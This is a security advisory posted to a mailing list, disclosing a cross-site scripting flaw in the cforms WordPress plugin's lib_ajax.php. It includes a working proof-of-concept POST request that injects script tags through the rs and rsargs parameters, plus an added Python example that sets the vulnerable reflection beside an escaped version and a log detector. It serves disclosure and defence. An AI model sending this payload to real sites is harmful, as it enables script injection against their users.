Dear List,
I'm writing on behalf of the Check Point Vulnerability Discovery Team to publish
the following vulnerability.
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/
cforms WordPress Plugin Cross Site Scripting Vulnerability
CVE-2010-3977
INTRODUCTION
According to Delicious Days, "cforms is a powerful and feature rich form plugin
for WordPress, offering convenient deployment of multiple Ajax
driven contact forms throughout your blog or even on the same page."
This problem was confirmed in the following version of the cforms WordPress
Plugin; other versions may also be affected.
cforms v11.5
CVSS Scoring System
The CVSS score is: 5.5
Base Score: 6.7
Temporal Score: 5.5
We used the following values to calculate the scores:
Base score is: AV:N/AC:L/Au:N/C:C/I:C/A:N
Temporal score is: E:F/RL:OF/RC:C
DETAILS
A data array is created in lib_ajax.php using values from a form field in a POST
request. The parameters rs and rsargs are not validated, so script code can be
injected into the page the plugin generates from them.
Request:
http://<server>/wp-content/plugins/cforms/lib_ajax.php

POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Host: <server>
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 219
Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765; comment_author_93f41ba0b16f34676f802058e82388f6=test; comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam%40checkpoint.com
Pragma: no-cache
Cache-Control: no-cache

rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://www.checkpoint.com$#$<script>alert(1)</script>
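As an added illustration, not part of the advisory and not the plugin's own code, the following Python parses a request body of the shape shown above, contrasts the unvalidated reflection the advisory describes with an HTML-encoded rendering, and reports which parameters a log reviewer would want flagged. The "$#$" field separator is taken from the request above; the sample body, the identifier allowlist for rs and the HTML layout are assumptions made for the example.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed sample POST body modelled on the advisory's request: the rsargs[]
# value is one string whose fields are separated by "$#$". Sample input only.
SAMPLE_BODY = (
    "rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854"
    "&rsargs[]=1$#$<script>alert(1)</script>$#$someone@example.com"
    "$#$http://www.example.com$#$<script>alert(1)</script>"
)

FIELD_SEPARATOR = "$#$"
# Assumed policy: a legitimate rs value is a plain identifier. The advisory does
# not list the plugin's real accepted values; this allowlist is an example.
RS_ALLOWED = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def parse_cforms_request(body):
    """Split a form-encoded body into the rs value and the rsargs[] fields
    (each rsargs[] entry is split on the $#$ separator)."""
    params = parse_qs(body, keep_blank_values=True)
    rs = params.get("rs", [""])[0]
    rsargs = [entry.split(FIELD_SEPARATOR) for entry in params.get("rsargs[]", [])]
    return {"rs": rs, "rsargs": rsargs}


def render_unsafe(parsed):
    """The pattern the advisory describes: request values are copied into the
    response without validation or encoding, so any markup survives intact."""
    rows = "".join("<li>%s</li>" % field for args in parsed["rsargs"] for field in args)
    return "<div id='%s'><ul>%s</ul></div>" % (parsed["rs"], rows)


def render_safe(parsed):
    """Hardened counterpart: refuse an rs value outside the allowlist and
    HTML-encode every reflected field (html.escape also encodes quotes)."""
    rs = parsed["rs"]
    if not RS_ALLOWED.match(rs):
        raise ValueError("rejected rs value: %r" % rs)
    rows = "".join(
        "<li>%s</li>" % html.escape(field, quote=True)
        for args in parsed["rsargs"] for field in args
    )
    return "<div id='%s'><ul>%s</ul></div>" % (rs, rows)


def looks_like_markup_injection(parsed):
    """Detection helper for request logs: name the parameters that carry angle
    brackets, which no legitimate rs or rsargs field should contain."""
    suspicious = []
    if "<" in parsed["rs"] or ">" in parsed["rs"]:
        suspicious.append("rs")
    for i, args in enumerate(parsed["rsargs"]):
        for j, field in enumerate(args):
            if "<" in field or ">" in field:
                suspicious.append("rsargs[%d][%d]" % (i, j))
    return suspicious


if __name__ == "__main__":
    parsed = parse_cforms_request(SAMPLE_BODY)
    print("flagged parameters:", looks_like_markup_injection(parsed))
    print("unsafe render keeps the script tag:", "<script>" in render_unsafe(parsed))
    try:
        render_safe(parsed)
    except ValueError as exc:
        print("hardened render refuses the request:", exc)
    # A benign request whose one field happens to contain angle brackets is
    # still served, but encoded, so the brackets reach the browser as text.
    benign = parse_cforms_request("rs=submit_form&rsargs[]=1$#$Alice <alice@example.com>")
    print(render_safe(benign))
```

The two renderers differ only in the allowlist check and the html.escape call: the vulnerable shape is output encoding that never happens, and the fix is the same whether the value lands in a list item, an attribute or a JavaScript string, as long as the encoding matches the context it lands in. The detection helper is deliberately crude (angle brackets only) so that it can run over historical access logs without parsing HTML.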
CREDITS
This vulnerability has been brought to our attention by Wagner Elias from Conviso
IT Security company (http://www.conviso.com.br) and researched internally by
Rodrigo Rubira Branco from the Check Point Vulnerability Discovery Team (VDT).
Best Regards,
Rodrigo.
--
Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies